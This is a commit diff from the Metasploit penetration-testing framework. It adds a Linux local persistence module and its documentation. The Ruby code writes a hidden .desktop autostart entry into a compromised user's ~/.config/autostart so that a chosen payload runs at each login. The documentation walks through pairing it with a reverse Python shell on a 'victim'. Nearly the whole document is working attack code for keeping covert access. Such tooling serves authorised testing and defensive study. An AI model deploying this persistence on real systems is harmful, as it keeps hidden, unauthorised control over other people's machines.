Land #10313, add linux autostart persistence module

2018-08-20 18:17:50 +08:00 · 2018-08-20 18:17:50 +08:00 · b8b48fd37a
parent 219668caae 865898cba7
commit b8b48fd37a
2 changed files with 84 additions and 0 deletions
--- a/documentation/modules/exploit/linux/local/autostart_persistence.md
+++ b/documentation/modules/exploit/linux/local/autostart_persistence.md
@ -0,0 +1,22 @@
+## Autostart persistence
+
+This module persist a payload by creating a `.desktop` entry for Linux desktop targets.
+
+### Testing
+
+1. Exploit a box
+2. `use exploit/linux/local/autostart_persistence`
+3. `set SESSION <id>`
+4. `set PAYLOAD cmd/unix/reverse_python` (for instance), configure the payload as needed
+5. `exploit`
+
+When the victim logs in your payload will be executed!
+
+
+### Options
+
+
+**NAME**
+
+Name of the `.desktop` entry to add, if not specified it will be chosen randomly.
+
--- a/modules/exploits/linux/local/autostart_persistence.rb
+++ b/modules/exploits/linux/local/autostart_persistence.rb
@ -0,0 +1,62 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Autostart Desktop Item Persistence',
+      'Description'    => %q(
+        This module will create an autostart entry to execute a payload.
+        The payload will be executed when the users logs in.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Eliott Teissonniere' ],
+      'Platform'       => [ 'unix', 'linux' ],
+      'Arch'           => ARCH_CMD,
+      'Payload'        => {
+        'BadChars'   => '#%\n"',
+        'Compat'     => {
+          'PayloadType'  => 'cmd',
+          'RequiredCmd'  => 'generic python netcat perl'
+        }
+      },
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
+      'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart
+      'Targets'        => [ ['Automatic', {}] ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ])
+  end
+
+  def exploit
+    name = datastore['NAME'] || Rex::Text.rand_text_alpha(5)
+
+    home = cmd_exec('echo ~')
+
+    path = "#{home}/.config/autostart/#{name}.desktop"
+
+    print_status('Making sure the autostart directory exists')
+    cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists
+
+    print_status("Uploading autostart file #{path}")
+
+    write_file(path, [
+      "[Desktop Entry]",
+      "Type=Application",
+      "Name=#{name}",
+      "NoDisplay=true",
+      "Terminal=false",
+      "Exec=/bin/sh -c \"#{payload.encoded}\""
+    ].join("\n"))
+  end
+end
+